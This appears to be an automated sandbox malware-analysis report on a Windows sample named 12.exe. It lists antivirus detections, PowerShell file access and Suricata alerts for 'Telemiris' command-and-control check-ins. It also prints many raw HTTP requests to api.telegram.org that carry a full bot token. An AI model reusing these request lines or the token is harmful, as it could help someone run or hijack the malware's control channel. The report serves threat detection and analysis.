2025-01-14T10:05:45.598094+010018100002Potentially Bad Traffic192.168.2.564985149.154.167.220443TCP
2025-01-14T10:05:50.635229+010018100002Potentially Bad Traffic192.168.2.564986149.154.167.220443TCP
2025-01-14T10:06:03.686867+010018100002Potentially Bad Traffic192.168.2.564987149.154.167.220443TCP
2025-01-14T10:06:05.631751+010018100002Potentially Bad Traffic192.168.2.564988149.154.167.220443TCP
2025-01-14T10:06:08.881366+010018100002Potentially Bad Traffic192.168.2.564989149.154.167.220443TCP
2025-01-14T10:06:19.882827+010018100002Potentially Bad Traffic192.168.2.564990149.154.167.220443TCP
2025-01-14T10:06:20.935845+010018100002Potentially Bad Traffic192.168.2.564991149.154.167.220443TCP
2025-01-14T10:06:35.060683+010018100002Potentially Bad Traffic192.168.2.564992149.154.167.220443TCP
2025-01-14T10:06:40.934228+010018100002Potentially Bad Traffic192.168.2.564993149.154.167.220443TCP
2025-01-14T10:06:43.848963+010018100002Potentially Bad Traffic192.168.2.564994149.154.167.220443TCP
2025-01-14T10:06:46.724880+010018100002Potentially Bad Traffic192.168.2.564995149.154.167.220443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: 12.exeVirustotal: Detection: 16%Perma Link
Source: 12.exeReversingLabs: Detection: 15%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: 12.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.3965066226.000001C861FC2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb" source: 12.exe
Source: Binary string: C:\Users\Admin\source\repos\ConsoleApplication5\x64\Release\ConsoleApplication5.pdb source: 12.exe
Source: C:\Users\user\Desktop\12.exeCode function: 0_2_00007FF73A40AAE0 FindFirstFileExW,0_2_00007FF73A40AAE0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

Networking

barindex
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:49705 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:49725 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:49704 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64791 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:49794 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64862 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64981 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64990 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64986 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64987 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64983 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64977 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64993 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64975 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64982 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64988 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64944 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64978 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64979 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64992 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64984 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64989 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64994 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64985 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64991 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64995 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64980 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2058964 - Severity 1 - ET MALWARE Telemiris CnC Checkin : 192.168.2.5:64976 -> 149.154.167.220:443
Source: unknownDNS query: name: api.telegram.org
Source: unknownDNS query: name: api.telegram.org
Source: global trafficTCP traffic: 192.168.2.5:64778 -> 162.159.36.2:53
Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49705 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49725 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49725 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49704 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64791 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64791 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:49794 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49794 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64862 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64862 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64981 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64981 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64990 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64990 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64986 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64986 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64987 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64975 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64978 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64987 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64983 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64983 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64977 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64977 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64988 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64982 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64993 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64993 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64975 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64982 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64988 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64944 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64944 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64978 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64979 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64979 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64984 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64989 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64992 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64992 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64984 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64989 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64994 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64994 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64985 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64985 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64991 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64991 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64995 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64995 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64980 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64980 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.5:64976 -> 149.154.167.220:443
Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:64976 -> 149.154.167.220:443
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownTCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.orgConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
Source: global trafficHTTP traffic detected: GET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.telegram.org
